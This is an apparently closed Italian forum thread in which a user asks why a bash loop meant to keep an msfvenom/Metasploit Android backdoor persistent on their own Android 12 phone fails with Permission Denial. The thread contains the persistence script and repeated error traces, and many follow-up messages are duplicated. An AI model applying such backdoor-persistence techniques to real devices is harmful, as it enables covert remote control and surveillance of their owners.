Domanda Rendere persistente backdoor su Android 12

  • Autore discussione Deleted member 284446
  • Data d'inizio
Stato
Discussione chiusa ad ulteriori risposte.
D

Deleted member 284446

Ciao a tutti, avrei necessita di capire perchè non riesco a rendere persistente sul mio telefono,Android 12,la backdooor che ho creato: in particolare ho creato con msfvenom una back door per android e l'ho messa sul mio telefono, poi ho eseguito metasploit e dopo essermi connesso al mio telefono ho lanciato ,da shell lo script .sh con le seguenti istruzioni:

#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 2000
done

ma mi và in errore : Permission Denial

Forse dipende dalla versione di Android per cui questo scipt è vecchio e non più adatto
Grazie a tutti
 
Ultima modifica da un moderatore:
Ciao 0xGhost, grazie per la risposta appena posso la provo e vi faccio sapere.Thanks
Messaggio unito automaticamente:

Non ci avevo pensato alla questione dei permessi sul file .sh
Messaggio unito automaticamente:

Purtroppo anche cambiando i permessi , ed eseguendo la shell sul mio file sh prima viene visualizzato:

Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }

-- poi ho sempre l'errore:

Exception occurred while executing 'start':
java.lang.SecurityException: Permission Denial: package=com.android.shell does not belong to uid=10419
at com.android.server.wm.ActivityTaskManagerService.assertPackageMatchesCallingUid(ActivityTaskManagerService.java:2325)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1346)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1337)
at com.android.server.am.ActivityManagerService.startActivityAsUserWithFeature(ActivityManagerService.java:3023)

Non sò se è un problema lato telefono, essendo la shell lanciata quando sono con il meterpreter nella cartella Download di android
Messaggio unito automaticamente:

Purtroppo anche cambiando i permessi , ed eseguendo la shell sul mio file sh prima viene visualizzato:

Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }

-- poi ho sempre l'errore:

Exception occurred while executing 'start':
java.lang.SecurityException: Permission Denial: package=com.android.shell does not belong to uid=10419
at com.android.server.wm.ActivityTaskManagerService.assertPackageMatchesCallingUid(ActivityTaskManagerService.java:2325)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1346)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1337)
at com.android.server.am.ActivityManagerService.startActivityAsUserWithFeature(ActivityManagerService.java:3023)

Non sò se è un problema lato telefono, essendo la shell lanciata quando sono con il meterpreter nella cartella Download di android
Messaggio unito automaticamente:

Potrebbe essere che bisogna impostare il file AndroidManifest.xml con 'android:exported="true"'? Ma non so sul telefono dove possa essere questo file
Messaggio unito automaticamente:

Ciao 0xGhost, grazie per la risposta appena posso la provo e vi faccio sapere.Thanks
Messaggio unito automaticamente:

Non ci avevo pensato alla questione dei permessi sul file .sh
Messaggio unito automaticamente:

Purtroppo anche cambiando i permessi , ed eseguendo la shell sul mio file sh prima viene visualizzato:

Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }

-- poi ho sempre l'errore:

Exception occurred while executing 'start':
java.lang.SecurityException: Permission Denial: package=com.android.shell does not belong to uid=10419
at com.android.server.wm.ActivityTaskManagerService.assertPackageMatchesCallingUid(ActivityTaskManagerService.java:2325)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1346)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1337)
at com.android.server.am.ActivityManagerService.startActivityAsUserWithFeature(ActivityManagerService.java:3023)

Non sò se è un problema lato telefono, essendo la shell lanciata quando sono con il meterpreter nella cartella Download di android
Messaggio unito automaticamente:

Purtroppo anche cambiando i permessi , ed eseguendo la shell sul mio file sh prima viene visualizzato:

Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }

-- poi ho sempre l'errore:

Exception occurred while executing 'start':
java.lang.SecurityException: Permission Denial: package=com.android.shell does not belong to uid=10419
at com.android.server.wm.ActivityTaskManagerService.assertPackageMatchesCallingUid(ActivityTaskManagerService.java:2325)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1346)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1337)
at com.android.server.am.ActivityManagerService.startActivityAsUserWithFeature(ActivityManagerService.java:3023)

Non sò se è un problema lato telefono, essendo la shell lanciata quando sono con il meterpreter nella cartella Download di android
Messaggio unito automaticamente:

Potrebbe essere che bisogna impostare il file AndroidManifest.xml con 'android:exported="true"'? Ma non so sul telefono dove possa essere questo file
Messaggio unito automaticamente:

Forse non posso eseguire il lancio del file.sh nella shell, perché il mio telefono non è rootable,e quindi potrei non avere i permessi totali sul telefono.Potrebbe essere un motivo secondo voi? Grazie
Messaggio unito automaticamente:

Ciao 0xGhost, grazie per la risposta appena posso la provo e vi faccio sapere.Thanks
Messaggio unito automaticamente:

Non ci avevo pensato alla questione dei permessi sul file .sh
Messaggio unito automaticamente:

Purtroppo anche cambiando i permessi , ed eseguendo la shell sul mio file sh prima viene visualizzato:

Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }

-- poi ho sempre l'errore:

Exception occurred while executing 'start':
java.lang.SecurityException: Permission Denial: package=com.android.shell does not belong to uid=10419
at com.android.server.wm.ActivityTaskManagerService.assertPackageMatchesCallingUid(ActivityTaskManagerService.java:2325)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1346)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1337)
at com.android.server.am.ActivityManagerService.startActivityAsUserWithFeature(ActivityManagerService.java:3023)

Non sò se è un problema lato telefono, essendo la shell lanciata quando sono con il meterpreter nella cartella Download di android
Messaggio unito automaticamente:

Purtroppo anche cambiando i permessi , ed eseguendo la shell sul mio file sh prima viene visualizzato:

Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }

-- poi ho sempre l'errore:

Exception occurred while executing 'start':
java.lang.SecurityException: Permission Denial: package=com.android.shell does not belong to uid=10419
at com.android.server.wm.ActivityTaskManagerService.assertPackageMatchesCallingUid(ActivityTaskManagerService.java:2325)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1346)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1337)
at com.android.server.am.ActivityManagerService.startActivityAsUserWithFeature(ActivityManagerService.java:3023)

Non sò se è un problema lato telefono, essendo la shell lanciata quando sono con il meterpreter nella cartella Download di android
Messaggio unito automaticamente:

Potrebbe essere che bisogna impostare il file AndroidManifest.xml con 'android:exported="true"'? Ma non so sul telefono dove possa essere questo file
Messaggio unito automaticamente:


Messaggio unito automaticamente:

Forse non posso eseguire il lancio del file.sh nella shell, perché il mio telefono non è rootable,e quindi potrei non avere i permessi totali sul telefono.Potrebbe essere un motivo secondo voi? Grazie

Ciao 0xGhost, grazie per la risposta appena posso la provo e vi faccio sapere.Thanks
Messaggio unito automaticamente:

Non ci avevo pensato alla questione dei permessi sul file .sh
Messaggio unito automaticamente:

Purtroppo anche cambiando i permessi , ed eseguendo la shell sul mio file sh prima viene visualizzato:

Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }

-- poi ho sempre l'errore:

Exception occurred while executing 'start':
java.lang.SecurityException: Permission Denial: package=com.android.shell does not belong to uid=10419
at com.android.server.wm.ActivityTaskManagerService.assertPackageMatchesCallingUid(ActivityTaskManagerService.java:2325)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1346)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1337)
at com.android.server.am.ActivityManagerService.startActivityAsUserWithFeature(ActivityManagerService.java:3023)

Non sò se è un problema lato telefono, essendo la shell lanciata quando sono con il meterpreter nella cartella Download di android
Messaggio unito automaticamente:

Purtroppo anche cambiando i permessi , ed eseguendo la shell sul mio file sh prima viene visualizzato:

Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }

-- poi ho sempre l'errore:

Exception occurred while executing 'start':
java.lang.SecurityException: Permission Denial: package=com.android.shell does not belong to uid=10419
at com.android.server.wm.ActivityTaskManagerService.assertPackageMatchesCallingUid(ActivityTaskManagerService.java:2325)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1346)
at com.android.server.wm.ActivityTaskManagerService.startActivityAsUser(ActivityTaskManagerService.java:1337)
at com.android.server.am.ActivityManagerService.startActivityAsUserWithFeature(ActivityManagerService.java:3023)

Non sò se è un problema lato telefono, essendo la shell lanciata quando sono con il meterpreter nella cartella Download di android
Messaggio unito automaticamente:

Potrebbe essere che bisogna impostare il file AndroidManifest.xml con 'android:exported="true"'? Ma non so sul telefono dove possa essere questo file
Messaggio unito automaticamente:


Messaggio unito automaticamente:

Forse non posso eseguire il lancio del file.sh nella shell, perché il mio telefono non è rootable,e quindi potrei non avere i permessi totali sul telefono.Potrebbe essere un motivo secondo voi? Grazie
Forse non posso eseguire il lancio del file.sh nella shell, perché il mio telefono non è rootable,e quindi potrei non avere i permessi totali sul telefono.Potrebbe essere un motivo secondo voi? Grazie
 
  • Mi piace
Reazioni: Conti
Stato
Discussione chiusa ad ulteriori risposte.